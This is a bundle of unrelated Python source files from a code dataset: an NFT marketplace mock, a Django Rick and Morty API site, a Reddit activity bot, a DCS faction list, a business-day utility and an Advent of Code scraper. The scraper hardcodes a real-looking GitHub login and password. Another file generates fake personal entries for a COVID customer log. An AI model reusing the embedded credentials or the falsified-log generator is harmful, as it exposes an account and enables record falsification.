):\n self.owner = {}\n self.ownerAddress = owner['address']\n self.owner[self.ownerAddress] = owner['secret']\n\n self.artists = {}\n self.users = {}\n\n self.tokenType = '10000001'\n self.nft = NFT(self.tokenType, owner, config) # NFT\n self.st = ServiceToken(owner, config) # [FAN]\n\n self.artist_fee = 0.05 # 5%\n self.platform_fee = 0.05 # 5%\n\n self.config = config\n\n self.DB = DB()\n _ = self.insertSamples(startNum=0, endNum=sampleLoad)\n\n def insertSamples(self, startNum=0, endNum=20):\n res = []\n\n print(\"Init: Upload Samples...\")\n for i in tqdm(range(startNum, endNum)):\n with open('./samples/sample' + str(i) + '.json', 'r') as f:\n sample = json.load(f)\n\n # index\n idx = self.DB._getPkIndex()\n sample['pk'] = idx\n\n sample['serial_num'] = FAKE_SERIAL_NUM\n\n # insert at DB\n self.DB.table[idx] = sample\n\n res.append(FAKE_HASH)\n\n return res\n\n # def change_owner(self):\n # pass\n\n def add_artist(self, artist: dict):\n self.artists[artist['address']] = artist['secret']\n\n def add_user(self, user: dict):\n self.users[user['address']] = user['secret']\n\n def is_artist(self, who: str):\n return who in self.artists\n\n def is_user(self, who: str):\n return who in self.users\n\n # DB\n\n # deprecated\n # def upload(self): pass\n\n def getImage(self, primaryKey: str):\n return self.DB.getImage(primaryKey)\n\n def getAllImages(self, startNum=0, endNum=100):\n return self.DB.getAllImages(startNum=startNum, endNum=endNum)\n\n def updateFavorite(self, primaryKey: str, favor=True):\n self.DB.updateFavorite(primaryKey, favor)\n\n def sellReset(self, startNum=0, endNum=100):\n self.DB.sellReset(startNum=startNum, endNum=endNum)\n\n def buy(\n self,\n pk: str,\n fromAddress: str,\n toAddress: str,\n tokenIndex: str = None,\n price: str = None\n ):\n res = []\n\n # update DB\n self.DB.table[pk]['is_selled'] = True\n self.DB.table[pk]['owner_addr'] = fromAddress\n\n res.append(FAKE_HASH)\n res.append(FAKE_HASH)\n res.append(FAKE_HASH)\n res.append(FAKE_HASH)\n\n # return txs\n return res\n\n\nif __name__ == \"__main__\":\n from pprint import pprint\n\n # Load info.\n with open('./users.json') as f:\n users = json.load(f)\n\n owner = users['Owner']\n artist = users['Artist']\n user_A = users['Customer_A']\n user_B = users['Customer_B']\n\n with open('./config.json') as f:\n config = json.load(f)\n\n # Set Fantopia service\n fantopia = Fantopia(owner, config)\n\n # Add artist\n fantopia.add_artist(artist)\n\n # Add user\n fantopia.add_user(user_A)\n fantopia.add_user(user_B)\n\n # Buy image\n res = fantopia.buy(\n pk=\"1\",\n fromAddress=user_B['address'],\n toAddress=user_A['address'],\n # tokenIndex='00000085',\n price='100'\n )\n pprint(res)\n\n # res = get_transaction_info(\n # server_url=config['server_url'],\n # service_api_key=config['service_api_key'],\n # service_api_secret=config['service_api_secret'],\n # txHash=\"DCD0B2D32E9329D77AA642A55DC10469A876767493D2F60254A70E4DCD099202\"\n # )\n # pprint(res)\n","sub_path":"example/server/fantopia_offline.py","file_name":"fantopia_offline.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"53649307","text":"#!/usr/bin/env python3\n#\n# phase-deuce\n# https://github.com/gregkrsak/phase-deuce\n#\n# Automatically populates a random daily log of customers for businesses offering table service.\n# Inspired by Phase 2 of WA State Governor Inslee's COVID-19 reopening plan. Of course, this is\n# to be used for testing purposes only!\n#\n# Copyright (c) 2020 Greg M. Krsak (greg.krsak@gmail.com)\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\n# Required for io.StringIO()\nimport io\n# Required for .CSV file operations\nimport csv\n# Required for datetime.date()\nimport datetime\n# Required for zlib.adler32()\nimport zlib\n# Required for standard input/output routines\nimport sys\n# Required for atexit.register()\nimport atexit\n# Required for time.time()\nimport time\n# Required for checking keypresses\nimport tty\nimport termios\n# Required for random number generation\nimport random\n# Required for regular expressions\nimport re\n\n\n# Constants used for logging\nLOG_LEVEL_DEBUG = 1\nLOG_LEVEL_INFO = 2\nLOG_LEVEL_WARN = 3\nLOG_LEVEL_ERROR = 4\nLOG_LEVEL_SYSTEM = 5\nLOG_LEVEL_NONE = 100\n# Constants used for identity indexing\nID_NAME = 0\nID_EMAIL = 1\nID_PHONE = 2\n\n\ndef init(argv):\n \"\"\"\n This is the code block that is run on startup.\n :return: None\n \"\"\"\n app = Application()\n app.run()\n return\n\n\n##########################################################################################\n## Abstract classes ##\n##########################################################################################\n\n\nclass Model:\n \"\"\"\n An abstract MVC model.\n \"\"\"\n def __init__(self, view):\n self.view = view\n\n\nclass View:\n \"\"\"\n An abstract MVC view.\n \"\"\"\n def __init__(self, output_stream):\n self.buffer = io.StringIO()\n self.output = output_stream\n\n def waiting_output(self):\n result = self.buffer.getvalue()\n self.buffer.truncate(0)\n return result\n\n def update(self):\n \"\"\"\n Flush the output buffer.\n \"\"\"\n self.output.write(self.waiting_output())\n\n\nclass Controller:\n \"\"\"\n An abstract MVC controller.\n \"\"\"\n def __init__(self):\n self.model = Model()\n self.view = View()\n\n\n##########################################################################################\n## Main program classes ##\n##########################################################################################\n\n\nclass Application(Controller):\n \"\"\"\n The primary application code for the phase-deuce program.\n :return: None\n \"\"\"\n\n def __init__(self):\n atexit.register(self.shutdown)\n self.startup()\n pass\n\n def startup(self):\n \"\"\"\n Performs tasks for the Application instance that should happen on startup.\n \"\"\"\n # Initialize the internal logger (unrelated to writing to .CSV files)\n self.log = Log(LOG_LEVEL_INFO)\n\n result = True\n try:\n # Initialize the random number generator\n random.seed()\n # Initialize the primary MVC view\n self.view = Screen()\n # Initialize the primary MVC model\n self.model = Database(self.log)\n # Initialize the input stream\n self.input_stream = sys.stdin\n except:\n # Was an exception thrown?\n result = False\n\n self.log.system(result, 'Application startup')\n return\n\n def run(self):\n \"\"\"\n Runs the Application instance.\n \"\"\"\n the_user_still_wants_to_run_this_application = True\n self.log.info('Welcome to phase-deuce')\n self.log.info('Written by Greg M. Krsak (greg.krsak@gmail.com)')\n self.log.info('Contribute or file bugs here: https://github.com/gregkrsak/phase-deuce')\n self.log.info('Press SPACE to add a new log entry. Press Q or X to exit.')\n\n while the_user_still_wants_to_run_this_application:\n user_input = self.get_char()\n # Did the user press SPACEBAR?\n if user_input == ' ':\n # Add a new row to the database\n db_write_succeeded = self.model.create_row()\n self.log.system(db_write_succeeded, 'Log entry written')\n # Did the user press the Q or X key?\n elif user_input.upper() == 'Q' or user_input.upper() == 'X':\n # Exit\n the_user_still_wants_to_run_this_application = False\n\n return\n\n def shutdown(self):\n \"\"\"\n Performs tasks for the Application instance that should happen on shutdown.\n \"\"\"\n result = True\n try:\n pass # Do nothing\n except:\n # Was an exception thrown?\n result = False\n self.log.system(result, 'Application shutdown')\n return\n\n def get_char(self):\n \"\"\"\n Gets a single keypress\n Ref: https://gist.github.com/jasonrdsouza/1901709\n \"\"\"\n file_descriptor = self.input_stream.fileno()\n old_settings = termios.tcgetattr(file_descriptor)\n try:\n tty.setraw(self.input_stream.fileno())\n result = sys.stdin.read(1)\n finally:\n termios.tcsetattr(file_descriptor, termios.TCSADRAIN, old_settings)\n return result\n\n\nclass Database(Model):\n \"\"\"\n This class performs database operations on .CSV files.\n The filename format is: phase-deuce-log_YYYY-MM-DD.csv\n The row format is: unix_time,full_name,email_address,phone_number,checksum\n \"\"\"\n\n empty_string = ''\n delimiter_string = ','\n quote_string = '\"'\n\n encoding = 'utf-8'\n\n filename_prefix = 'phase-deuce-log_'\n filename_suffix = '.csv'\n\n column_unix_time = 0\n column_full_name = 1\n column_email_address = 2\n column_phone_number = 3\n column_checksum = 4\n\n def __init__(self, log):\n super().__init__(log)\n\n def todays_filename(self):\n \"\"\"\n Calculates today's filename string using the ISO 8601 format date.\n :return: A string with the format \"phase-deuce-log_YYYY-MM-DD.csv\".\n \"\"\"\n date_string = datetime.date.today().isoformat()\n result = Database.filename_prefix + date_string + Database.filename_suffix\n return result\n\n def validate(self, filename=None):\n \"\"\"\n Validates today's .CSV file.\n :return: True or False, depending on if the validation was successful.\n \"\"\"\n # Figure out the filaname\n if not filename:\n filename = self.todays_filename()\n # Default to success\n result = True\n try:\n with open(filename, 'r', newline=Database.empty_string) as file:\n db = csv.reader(file,\n delimiter=Database.delimiter_string,\n quotechar=Database.quote_string)\n # Iterate over each row\n for row in db:\n # Create a string from the joined list items of this row\n row_string = Database.delimiter_string.join(row)\n # Create the string to validate via checksum\n string_to_validate = row[Database.column_unix_time] \\\n + row[Database.column_full_name] \\\n + row[Database.column_email_address] \\\n + row[Database.column_phone_number]\n # Create a binary encoded representation of that same string\n bytes_to_validate = string_to_validate.encode(encoding=Database.encoding)\n # Calculate checksum and read the existing checksum\n fresh_checksum = zlib.adler32(bytes_to_validate)\n existing_checksum = int(row[Database.column_checksum])\n # Fail if any row's checksum does not match\n if (fresh_checksum != existing_checksum):\n result = False\n except:\n # Was an exception thrown?\n result = False\n return result\n\n\n def create_row(self):\n \"\"\"\n Creates a database row that's populated with fake personally-identifying data.\n Note that the columns 'unix_time' and 'checksum' will be valid.\n :return: True or False, depending on if the write is considered successful.\n \"\"\"\n filename = self.todays_filename()\n # Default to success\n result = True\n try:\n with open(filename, 'a', newline=Database.empty_string) as file:\n db = csv.writer(file,\n delimiter=Database.delimiter_string,\n quotechar=Database.quote_string)\n # Get the current UNIX time\n unix_time = int(time.time())\n # Create the fake person\n identity = PersonGenerator.new_identity()\n # Prepare the data to be validated later via checksum\n string_to_validate = str(unix_time) \\\n + identity[ID_NAME] \\\n + identity[ID_EMAIL] \\\n + identity[ID_PHONE]\n bytes_to_validate = string_to_validate.encode(encoding=Database.encoding)\n # Calculate the checksum\n checksum = zlib.adler32(bytes_to_validate)\n # Write the row data to the .CSV file\n row = [unix_time, identity[ID_NAME], identity[ID_EMAIL], identity[ID_PHONE], checksum]\n db.writerow(row)\n # Re-validate the database after the write\n result = self.validate(filename)\n except:\n # Was an exception thrown?\n result = False\n return result\n\n\nclass Screen(View):\n \"\"\"\n Represents the stdout stream.\n \"\"\"\n\n eol = '\\n'\n\n def __init__(self):\n super().__init__(sys.stdout)\n\n\nclass Log(Screen):\n \"\"\"\n This class logs application events to the screen.\n \"\"\"\n\n eol = Screen.eol\n\n prefix_braces = ['[ ', ' ]']\n prefix_separator = ' '\n system_ok_string = 'OK'\n system_fail_string = 'FAIL'\n debug_string = 'DEBUG'\n info_string = 'INFO'\n warn_string = 'WARN'\n error_string = 'ERROR'\n\n def __init__(self, level):\n super().__init__()\n self.level = level\n\n def system(self, status, message):\n if self.level <= LOG_LEVEL_SYSTEM:\n if status == True:\n self.__printlog(self.system_ok_string, message)\n else:\n self.__printlog(self.system_fail_string, message)\n\n def debug(self, message):\n if self.level <= LOG_LEVEL_DEBUG:\n self.__printlog(self.debug_string, message)\n\n def info(self, message):\n if self.level <= LOG_LEVEL_INFO:\n self.__printlog(self.info_string, message)\n\n def warn(self, message):\n if self.level <= LOG_LEVEL_WARN:\n self.__printlog(self.warn_string, message)\n\n def error(self, message):\n if self.level <= LOG_LEVEL_ERROR:\n self.__printlog(self.error_string, message)\n\n def __printlog(self, prefix_string, message):\n self.buffer.write(self.prefix_braces[0] + prefix_string + self.prefix_braces[1] \\\n + self.prefix_separator + message + Log.eol)\n self.update()\n\n\nclass PersonGenerator():\n \"\"\"\n This is a static class used to generate pseudo-random \"personal info\".\n I was pretty tired when I wrote this, so forigve me if it looks like a giant hack.\n \"\"\"\n\n __first_names = ['Robert', 'Shawn', 'William', 'James', 'Oliver', 'Benjamin', \\\n 'Elijah', 'Lucas', 'Dick', 'Logan', 'Alexander', 'Ethan', \\\n 'Jacob', 'Michael', 'Daniel', 'Henry', 'Jackson', 'Sebastian', \\\n 'Peter', 'Matthew', 'Samuel', 'David', 'Joseph', 'Carter', \\\n 'Mary', 'Patricia', 'Linda', 'Barbara', 'Elizabeth', 'Jennifer', \\\n 'Maria', 'Susan', 'Margaret', 'Dorothy', 'Lisa', 'Nancy', \\\n 'Karen', 'Betty', 'Helen', 'Sandra', 'Donna', 'Carol', \\\n 'Ruth', 'Sharon', 'Michelle', 'Laura', 'Sarah', 'Kimberly']\n __last_names = ['Smith', 'Johnson', 'Williams', 'Brown', 'Jones', 'Miller', \\\n 'Davis', 'Wilson', 'Anderson', 'Taylor', 'Moore', 'Thomas', \\\n 'Jackson', 'White', 'Harris', 'Martin', 'Thompson', 'Garcia', \\\n 'Martinez', 'Robinson', 'Clark', 'Rodriguez', 'Lewis', 'Lee', \\\n 'Walker', 'Hall', 'Allen', 'Young', 'Hernandez', 'King', \\\n 'Wang', 'Devi', 'Zhang', 'Li', 'Liu', 'Singh', \\\n 'Yang', 'Kumar', 'Wu', 'Xu']\n __email_domains = ['gmail.com', 'outlook.com', 'yahoo.com', 'icloud.com', 'aol.com', 'mail.com']\n\n def new_identity():\n # Initialize an empty list to store the result\n result = ['', '', '']\n # Calculate the length of the name lists\n first_names_len = len(PersonGenerator.__first_names)\n last_names_len = len(PersonGenerator.__last_names)\n # Choose a random first and last name\n first_names_index = random.randrange(0, first_names_len)\n last_names_index = random.randrange(0, last_names_len)\n first_name = PersonGenerator.__first_names[first_names_index]\n last_name = PersonGenerator.__last_names[last_names_index]\n # Build the new name\n result[ID_NAME] = first_name + ' ' + last_name\n # Build the new email address\n result[ID_EMAIL] = PersonGenerator.__generate_email(first_name, last_name)\n # Build the new phone number\n result[ID_PHONE] = PersonGenerator.__generate_phone_number()\n\n return result\n\n def __generate_email(first_name, last_name):\n # Email style constants\n STYLE_FIRST_DOT_LAST = 0\n STYLE_LAST_DOT_FIRST = 1\n STYLE_FIRST_LAST = 2\n STYLE_F_LAST = 3\n # Select a random email style\n style = random.randrange(STYLE_FIRST_DOT_LAST, STYLE_F_LAST + 1)\n # Make the first and last names lowercase\n first_name = first_name.lower()\n last_name = last_name.lower()\n # Calculate the length of the email domain list\n email_domains_len = len(PersonGenerator.__email_domains)\n # Choose a random email domain\n email_domains_index = random.randrange(0, email_domains_len)\n domain_name = PersonGenerator.__email_domains[email_domains_index]\n # Format the email username\n if style == STYLE_FIRST_DOT_LAST:\n username = first_name + '.' + last_name\n elif style == STYLE_LAST_DOT_FIRST:\n username = last_name + '.' + first_name\n elif style == STYLE_FIRST_LAST:\n username = first_name + last_name\n elif style == STYLE_F_LAST:\n username = first_name[0] + last_name\n # Return the finished email address\n result = username + '@' + domain_name\n return result\n\n def __generate_phone_number():\n # This regex validates a 10-digit telephone number\n # Ref: https://www.oreilly.com/library/view/regular-expressions-cookbook/9781449327453/ch04s02.html\n nanp_regex = re.compile('^\\(?([2-9][0-8][0-9])\\)?[-.]?([2-9][0-9]{2})[-.]?([0-9]{4})$')\n # Generate random phone numbers until we get one that's valid according to the NANP\n phone_number_is_invalid = True\n while phone_number_is_invalid:\n result = str(PersonGenerator.__generate_npa()) + '-' \\\n + str(PersonGenerator.__generate_nxx()) + '-' \\\n + str(PersonGenerator.__generate_xxxx())\n if nanp_regex.match(result):\n phone_number_is_invalid = False\n return result\n\n def __generate_npa():\n result = random.randrange(0, 1000)\n return result\n\n def __generate_nxx():\n result = random.randrange(0, 1000)\n return result\n\n def __generate_xxxx():\n result = random.randrange(0, 10000)\n return result\n\n\n##########################################################################################\n## Bootstrap ##\n##########################################################################################\n\n\n# Bootstraps the application via the init() function\nif __name__ == '__main__':\n argv = ''\n try:\n argv = sys.argv[1]\n except:\n pass\n init(argv)\n\n# End of phase-deuce.py\n","sub_path":"phase-deuce.py","file_name":"phase-deuce.py","file_ext":"py","file_size_in_byte":17692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"527858079","text":"from dcs.helicopters import *\nfrom dcs.planes import *\nfrom dcs.ships import *\nfrom dcs.vehicles import *\n\nfrom pydcs_extensions.a4ec.a4ec import A_4E_C\nfrom pydcs_extensions.mb339.mb339 import MB_339PAN\n\nBLUEFOR_COLDWAR_MODS = {\n \"country\": \"USA\",\n \"side\": \"blue\",\n \"units\": [\n\n F_14B,\n F_4E,\n F_5E_3,\n A_10A,\n AJS37,\n A_4E_C,\n MB_339PAN,\n\n KC_135,\n KC130,\n C_130,\n E_3A,\n\n UH_1H,\n SA342M,\n SA342L,\n\n Armor.MBT_M60A3_Patton,\n Armor.APC_M113,\n\n Unarmed.Transport_M818,\n Infantry.Infantry_M4,\n Infantry.Soldier_M249,\n\n AirDefence.SAM_Hawk_PCP,\n AirDefence.SAM_Chaparral_M48,\n\n CVN_74_John_C__Stennis,\n LHA_1_Tarawa,\n Armed_speedboat,\n ], \"shorad\": [\n AirDefence.AAA_Vulcan_M163,\n ], \"aircraft_carrier\": [\n CVN_74_John_C__Stennis,\n ], \"helicopter_carrier\": [\n LHA_1_Tarawa,\n ], \"cruiser\": [\n Ticonderoga_class,\n ], \"carrier_names\": [\n \"CVN-71 Theodore Roosevelt\",\n \"CVN-72 Abraham Lincoln\",\n \"CVN-73 George Washington\",\n \"CVN-74 John C. Stennis\",\n ], \"lhanames\": [\n \"LHA-1 Tarawa\",\n \"LHA-2 Saipan\",\n \"LHA-3 Belleau Wood\",\n \"LHA-4 Nassau\",\n \"LHA-5 Peleliu\"\n ], \"boat\": [\n ], \"requirements\": {\n \"MB-339A\": \"http://www.freccetricolorivirtuali.net/\",\n \"Community A-4E\": \"https://heclak.github.io/community-a4e-c/\",\n }, \"has_jtac\": True\n}\n","sub_path":"game/factions/bluefor_coldwar_mods.py","file_name":"bluefor_coldwar_mods.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"92356022","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport requests\n\n# Create your views here.\ndef home_view(request):\n response = requests.get('https://rickandmortyapi.com/api/episode')\n data = response.json()\n url_next = data[\"info\"][\"next\"]\n while url_next != \"\":\n response2 = requests.get(url_next)\n data2 = response2.json()\n data[\"results\"].extend(data2[\"results\"])\n url_next = data2[\"info\"][\"next\"]\n return render(request, \"home.html\", data)\n\n\ndef capitulo_view(request, num = 1):\n response = requests.get(f'https://rickandmortyapi.com/api/episode/{num}')\n data = response.json()\n links = data[\"characters\"]\n characters = []\n for link in links:\n characters.append(int(link.split('/')[-1]))\n response2 = requests.get(f'https://rickandmortyapi.com/api/character/{characters}')\n data2 = response2.json()\n lista_personajes = []\n for perso in data2:\n personaje = dict()\n personaje[\"id\"] = perso[\"id\"]\n personaje[\"nombre\"] = perso[\"name\"]\n lista_personajes.append(personaje)\n data[\"lista_personajes\"] = lista_personajes\n return render(request, \"capitulo.html\", data)\n\ndef personaje_view(request, num = 1):\n response = requests.get(f'https://rickandmortyapi.com/api/character/{num}')\n data = response.json()\n links = data[\"episode\"]\n capitulos = []\n for link in links:\n capitulos.append(int(link.split('/')[-1]))\n response2 = requests.get(f'https://rickandmortyapi.com/api/episode/{capitulos}')\n data2 = response2.json()\n lista_capitulos = []\n for cap in data2:\n capitulo = dict()\n capitulo[\"id\"] = cap[\"id\"]\n capitulo[\"nombre\"] = cap[\"name\"]\n lista_capitulos.append(capitulo)\n data[\"lista_capitulos\"] = lista_capitulos\n\n id_personaje = data[\"location\"][\"url\"].split('/')[-1]\n data[\"location\"][\"id\"]= id_personaje\n\n return render(request, \"personaje.html\", data)\n\ndef lugar_view(request, num = 1):\n response = requests.get(f'https://rickandmortyapi.com/api/location/{num}')\n data = response.json()\n links = data[\"residents\"]\n characters = []\n for link in links:\n characters.append(int(link.split('/')[-1]))\n response2 = requests.get(f'https://rickandmortyapi.com/api/character/{characters}')\n data2 = response2.json()\n lista_personajes = []\n for perso in data2:\n personaje = dict()\n personaje[\"id\"] = perso[\"id\"]\n personaje[\"nombre\"] = perso[\"name\"]\n lista_personajes.append(personaje)\n data[\"lista_personajes\"] = lista_personajes\n return render(request, \"lugar.html\", data)\n\ndef busqueda_view(request):\n if request.method == 'GET': # If the form is submitted\n search_query = request.GET.get('search_box', None)\n response_personajes = requests.get(f'https://rickandmortyapi.com/api/character/?name={search_query}')\n data_personajes = response_personajes.json()\n response_lugares = requests.get(f'https://rickandmortyapi.com/api/location/?name={search_query}')\n data_lugares = response_lugares.json()\n response_capitulos = requests.get(f'https://rickandmortyapi.com/api/episode/?name={search_query}')\n data_capitulos = response_capitulos.json()\n data = dict()\n if \"info\" in data_personajes.keys():\n url_next_personajes = data_personajes[\"info\"][\"next\"]\n while url_next_personajes != \"\":\n response2 = requests.get(url_next_personajes)\n data2 = response2.json()\n data_personajes[\"results\"].extend(data2[\"results\"])\n url_next_personajes = data2[\"info\"][\"next\"]\n data[\"results_personajes\"] = data_personajes[\"results\"]\n\n if \"info\" in data_lugares.keys():\n url_next_lugares = data_lugares[\"info\"][\"next\"]\n while url_next_lugares != \"\":\n response2 = requests.get(url_next_lugares)\n data2 = response2.json()\n data_lugares[\"results\"].extend(data2[\"results\"])\n url_next_lugares = data2[\"info\"][\"next\"]\n data[\"results_lugares\"] = data_lugares[\"results\"]\n\n if \"info\" in data_capitulos.keys():\n url_next_capitulos = data_capitulos[\"info\"][\"next\"]\n while url_next_capitulos != \"\":\n response2 = requests.get(url_next_capitulos)\n data2 = response2.json()\n data_capitulos[\"results\"].extend(data2[\"results\"])\n url_next_capitulos = data2[\"info\"][\"next\"]\n data[\"results_capitulos\"] = data_capitulos[\"results\"]\n return render(request, \"busqueda.html\", data)\n","sub_path":"t1_django_project/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"614512493","text":"from collections import Counter\n\nfrom praw import Reddit\nfrom psaw import PushshiftAPI\n\n\nclass Activity:\n def __init__(self, reddit: Reddit):\n self.reddit = reddit\n self.api = PushshiftAPI(reddit)\n\n def combined(self, username: str, limit: int = 5) -> Counter:\n activity = self.api.redditor_subreddit_activity(username)\n counts = activity.get(\"comment\", Counter([]))\n counts.update(activity.get(\"submission\", Counter([])))\n return counts.most_common(limit)\n\n def combined_formatted(self, username: str, limit: int = 5) -> str:\n data = self.combined(username, limit)\n output = [\n f\"Here are the top 5 most active subreddits for /u/{username}:\",\n \"\",\n \"Subreddit | Total activity\",\n \"---|:---:\",\n ]\n try:\n output.extend([f\"/r/{subreddit} | {count:,}\" for subreddit, count in data])\n except ValueError:\n output.extend([f\"/r/{subreddit} | {count}\" for subreddit, count in data])\n output.extend(\n [\" \", \"> I am a bot, this action was performed automatically\"]\n )\n return \"\\n\".join(output)\n","sub_path":"tattle_bot/model/Activity.py","file_name":"Activity.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"82157781","text":"from selenium import webdriver\nfrom collections import Counter\nimport itertools\nimport math\nimport os.path\n\ndef getPuzzleinput(day):\n\n if os.path.isfile(\"input_Day\"+str(day)+'.txt'):\n input = []\n file = open(\"input_Day\" + str(day)+'.txt', 'r')\n for i in file:\n i=i.strip()\n input.append(i)\n file.close()\n return input\n\n else:\n\n driver = webdriver.Chrome()\n driver.get('https://adventofcode.com/2018/day/'+str(day))\n # url=\"https://adventofcode.com/\"\n # webbrowser.open(url,new=2)\n\n elem1 = driver.find_element_by_link_text('[GitHub]')\n elem1.click()\n\n driver.find_element_by_id('login_field').send_keys('Rostbratwurst')\n driver.find_element_by_id('password').send_keys('Puller100')\n driver.find_element_by_name('commit').click()\n\n elem1 = driver.find_element_by_link_text('get your puzzle input')\n elem1.click()\n\n driver.switch_to.window(driver.window_handles[1])\n inp = driver.find_element_by_tag_name(\"body\")\n dayInput=inp.text\n driver.quit()\n\n with open('input_day'+str(day)+'.txt', 'w') as f:\n for line in dayInput:\n f.write(str(line))\n # f.write(\"\\n\")\n f.close()\n print(dayInput)\n return [i for i in dayInput.split(\"\\n\")]\n\ndef lettercount(list_of_strings):\n\n twotimes=int(0)\n threetimes=int(0)\n\n for string in list_of_strings:\n counter = Counter(string)\n counter_counter=Counter(counter.values())\n\n if counter_counter[2]>=1:\n twotimes+=1\n\n if counter_counter[3]>=1:\n threetimes+=1\n\n\n return twotimes,threetimes\n\ndef checksum(args):\n result=1\n for i in args:\n result=result*i\n return result\n\ndef similarity(list):\n\n for st1,st2 in itertools.combinations(list,2):\n diff=0\n for c1,c2 in zip(st1,st2):\n if c1 != c2:\n diff+=1\n diffletter=[c1,c2]\n if diff==1:\n print(st1)\n print(st2)\n print(diffletter)\n\n\nif __name__==\"__main__\":\n\n var=getPuzzleinput(2)\n resultsum=checksum(lettercount(var))\n part2=similarity(var)\n","sub_path":"Day2.py","file_name":"Day2.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"86168517","text":"import datetime as dt\n\n\"\"\"\nFind the date that is n business days from today. \nUse n < 0 to find past business days and n > 0 to find future business days. \n\"\"\"\n\n\ndef holiday(date):\n \"\"\"Determines if the date is a holiday or not.\"\"\"\n # input: date object\n # output: boolean (holiday = True) \n \n holidays = [] # array of holidays for the organization. \n if date in holidays:\n return True\n return False \n\n\ndef business_day(date):\n \"\"\"Determines if the date is a business day or not.\"\"\" \n # input: date object\n # output: boolean (business day = True)\n # Sunday = 0, Monday = 1, ... , Saturday = 6\n \n day_of_week = (int(date.weekday()) + 1) % 7\n if day_of_week not in [0, 6] and not holiday(date):\n return True \n return False \n \n\ndef n_business_days(date, n=-2):\n \"\"\"Returns the date that is n business days from today.\"\"\"\n # input: date object for today's date\n # input: integer representing the number of business days before or after the date.\n # output: date object for the date that is n business days from the input date.\n \n business_days = 0\n calendar_days = 0 \n\n if n != 0:\n step = int(n/abs(n))\n while business_days != abs(n):\n calendar_days = calendar_days + step\n if business_day(date + dt.timedelta(calendar_days)):\n business_days = business_days + 1\n return date + dt.timedelta(calendar_days)\n return date\n\n\ndef main():\n today = dt.date.today()\n print(today)\n n = int(input('Number of business days?:'))\n print(n_business_days(today, n))\n print()\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"n_business_days.py","file_name":"n_business_days.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"8343417","text":"import os\n\nfrom sparkpost.base import Resource\n\n\nclass Webhooks(Resource):\n key = \"webhooks\"\n\n def list(self, **kwargs):\n results = self.request('GET', self.uri, **kwargs)\n return results\n\n\napi_key = os.environ.get('SPARKPOST_API_KEY', None)\nwebhooks = Webhooks('https://api.sparkpost.com/api/v1', api_key)\n\n# returns a list of webhooks for your account\nprint(webhooks.list())\n","sub_path":"examples/base_resource.py","file_name":"base_resource.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"212355935","text":"def letter_change(string):\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n new_string = \"\"\n for char in string:\n if char in alphabet:\n if char == 'z':\n char = 'A'\n new_string += char\n else:\n index = string.find(char)\n index += 1\n char = alphabet[index] \n if char in \"aeiou\":\n char = char.upper()\n new_string += char\n else:\n new_string += char\n \n print(new_string)\n\nletter_change('abcd')\nletter_change('this is a beautiful day')\nletter_change(\"abcdefghijklmnopqrstuvwxyz\")\n\n# alternative solution\ndef letter_change_2(string): \n newString = \"\"\n \n for char in string:\n if char.isalpha():\n if char.lower() == 'z':\n char = 'a'\n else:\n char = chr(ord(char) + 1)\n\n if char in 'aeiou':\n char = char.upper()\n \n newString = newString + char\n\n return newString\n \nletter_change('abcd')\nletter_change('this is a beautiful day')\nletter_change(\"abcdefghijklmnopqrstuvwxyz\")\n","sub_path":"old/letter_change.py","file_name":"letter_change.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330205176","text":"from typing import Any\nfrom typing import Callable\nfrom typing import Mapping\nfrom typing import Optional\nfrom typing import TypeVar\n\nfrom . import engine as engine\nfrom .base import StartableContext as StartableContext\nfrom .engine import AsyncEngine as AsyncEngine\nfrom ... import util as util\nfrom ...engine import Result as Result\nfrom ...orm import Session as Session\nfrom ...sql import Executable as Executable\nfrom ...util.concurrency import greenlet_spawn as greenlet_spawn\n\n_T = TypeVar(\"_T\")\n\nclass AsyncSession:\n dispatch: Any = ...\n bind: Any = ...\n binds: Any = ...\n sync_session: Any = ...\n def __init__(\n self,\n bind: AsyncEngine = ...,\n binds: Mapping[object, AsyncEngine] = ...,\n **kw: Any,\n ) -> None: ...\n async def refresh(\n self,\n instance: Any,\n attribute_names: Optional[Any] = ...,\n with_for_update: Optional[Any] = ...,\n ): ...\n async def run_sync(\n self, fn: Callable[..., 